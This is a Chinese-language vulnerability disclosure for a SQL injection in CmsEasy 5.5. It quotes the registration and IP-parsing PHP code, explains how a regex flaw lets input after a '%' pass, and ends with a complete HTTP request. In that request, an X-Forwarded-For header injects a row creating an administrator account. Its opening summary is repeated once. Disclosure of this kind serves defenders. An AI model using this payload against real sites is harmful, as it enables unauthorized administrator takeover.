### 简要描述: CmsEasy最新版SQL注入可注册管理员 ### 详细说明: CmsEasy_5.5_UTF-8_20140420.rar 官方最新版存在SQL注入,无视GPC,可获取管理员账户,可注册管理员 不知道跟之前蓝哥的那个重复么,先发再看吧。。。 文件/lib/default/user_act.php ``` function respond_action() { ini_set("display_errors","On"); $classname = front::$get['ologin_code']; if(front::post('regsubmit')) { if(!config::get('reg_on')) { front::flash(lang('网站已经关闭注册!')); return; } if(front::post('username') != strip_tags(front::post('username')) ||front::post('username') != htmlspecialchars(front::post('username')) ) { front::flash(lang('用户名不规范!')); return; } if(strlen(front::post('username'))<4) { front::flash(lang('用户名太短!')); return; } if(front::post('username') &&front::post('password')) { $username=front::post('username'); $password=md5(front::post('password')); $data=array( 'username'=>$username, 'password'=>$password, 'groupid'=>101, 'userip'=>front::ip(), //======问题在这里====== $classname=>session::get('openid'), ); if($this->_user->getrow(array('username'=>$username))) {...
### 简要描述: CmsEasy最新版SQL注入可注册管理员 ### 详细说明: CmsEasy_5.5_UTF-8_20140420.rar 官方最新版存在SQL注入,无视GPC,可获取管理员账户,可注册管理员 不知道跟之前蓝哥的那个重复么,先发再看吧。。。 文件/lib/default/user_act.php ``` function respond_action() { ini_set("display_errors","On"); $classname = front::$get['ologin_code']; if(front::post('regsubmit')) { if(!config::get('reg_on')) { front::flash(lang('网站已经关闭注册!')); return; } if(front::post('username') != strip_tags(front::post('username')) ||front::post('username') != htmlspecialchars(front::post('username')) ) { front::flash(lang('用户名不规范!')); return; } if(strlen(front::post('username'))<4) { front::flash(lang('用户名太短!')); return; } if(front::post('username') &&front::post('password')) { $username=front::post('username'); $password=md5(front::post('password')); $data=array( 'username'=>$username, 'password'=>$password, 'groupid'=>101, 'userip'=>front::ip(), //======问题在这里====== $classname=>session::get('openid'), ); if($this->_user->getrow(array('username'=>$username))) { front::flash(lang('该用户名已被注册!')); return; } $insert=$this->_user->rec_insert($data); $_userid = $this->_user->insert_id(); if($insert){ front::flash(lang('注册成功!')); }else { front::flash(lang('注册失败!')); return; } $user=$data; cookie::set('login_username',$user['username']); cookie::set('login_password',front::cookie_encode($user['password'])); session::set('username',$user['username']); front::redirect(url::create('user')); exit; } } if (front::post('submit')) { if (front::post('username') && front::post('password')) { $username = front::post('username'); $password = md5(front::post('password')); $data = array( 'username' => $username, 'password' => $password, ); $user = new user(); $row = $user->getrow(array('username' => $data['username'], 'password' => $data['password'])); if (!is_array($row)) { $this->login_false(); return; } $post[$classname] = session::get('openid'); $this->_user->rec_update($post, 'userid=' . $row['userid']); cookie::set('login_username', $row['username']); cookie::set('login_password', front::cookie_encode($row['password'])); session::set('username', $row['username']); front::redirect(url::create('user')); return; } else { $this->login_false(); return; } } include_once ROOT.'/lib/plugins/ologin/'.$classname.'.php'; $ologinobj = new $classname(); $status = $ologinobj->respond(); //var_dump(session::get('openid'));exit; $where[$classname] = session::get('openid'); if(!$where[$classname]) front::redirect(url::create('user')); $user = new user(); $data = $user->getrow($where); if(!$data){ $this->view->data = $status; }else{ cookie::set('login_username',$data['username']); cookie::set('login_password',front::cookie_encode($data['password'])); session::set('username',$data['username']); front::redirect(url::create('user')); } } ``` 我们再进入ip()函数: 文件/lib/tool/front_class.php ``` static function ip() { if ($_SERVER['HTTP_CLIENT_IP']) { $onlineip = $_SERVER['HTTP_CLIENT_IP']; } elseif ($_SERVER['HTTP_X_FORWARDED_FOR']) { $onlineip = $_SERVER['HTTP_X_FORWARDED_FOR']; } elseif ($_SERVER['REMOTE_ADDR']) { $onlineip = $_SERVER['REMOTE_ADDR']; } else { $onlineip = $_SERVER['REMOTE_ADDR']; } if(config::get('ipcheck_enable')){ if(!preg_match('/^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$/', $onlineip)&&!preg_match('@^\s*((([0-9A-Fa-f]{1,4}:){7}(([0-9A-Fa-f]{1,4})|:))|(([0-9A-Fa-f]{1,4}:){6}(:|((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})|(:[0-9A-Fa-f]{1,4})))|(([0-9A-Fa-f]{1,4}:){5}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(([0-9A-Fa-f]{1,4}:){4}(:[0-9A-Fa-f]{1,4}){0,1}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(([0-9A-Fa-f]{1,4}:){3}(:[0-9A-Fa-f]{1,4}){0,2}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(([0-9A-Fa-f]{1,4}:){2}(:[0-9A-Fa-f]{1,4}){0,3}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(([0-9A-Fa-f]{1,4}:)(:[0-9A-Fa-f]{1,4}){0,4}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(:(:[0-9A-Fa-f]{1,4}){0,5}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})))(%.+)?\s*$@', $onlineip)){ exit('来源非法'); } } return $onlineip; } ``` 乍一看没什么问题,对ip进行了过滤 但是我们看看后面的那个正则的最后面: (%.+)?\s* 这里有一个%,然后后面可以跟任何内容,127.0.0.1%xxxxxx 这样也是符号正则的,这不就绕过了。。。。 难道这是后门?! 最后进入了:$insert=$this->_user->rec_insert($data); 导致了注入产生。。。 ### 漏洞证明: 之前的用户信息: [<img src="https://images.seebug.org/upload/201406/04173851c32d6175893d49402f04ef758921b872.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/04173851c32d6175893d49402f04ef758921b872.png) 发送请求: ``` POST /cmseasy1/index.php?case=user&act=respond HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 66 X-Forwarded-For: 127.0.0.1%'),('xfkxfk','e10adc3949ba59abbe56e057f20f883e','2','127.0.0.1')# username=666666&password=666666®submit=%2B%E6%B3%A8%E5%86%8C%2B ``` [<img src="https://images.seebug.org/upload/201406/041739140b5bdd8506a372e702c392fecf8752bf.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/041739140b5bdd8506a372e702c392fecf8752bf.png) 成功添加管理员xfkxfk [<img src="https://images.seebug.org/upload/201406/04173927c19d085b963cfb1d6b387cbe0b2216b0.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/04173927c19d085b963cfb1d6b387cbe0b2216b0.png)
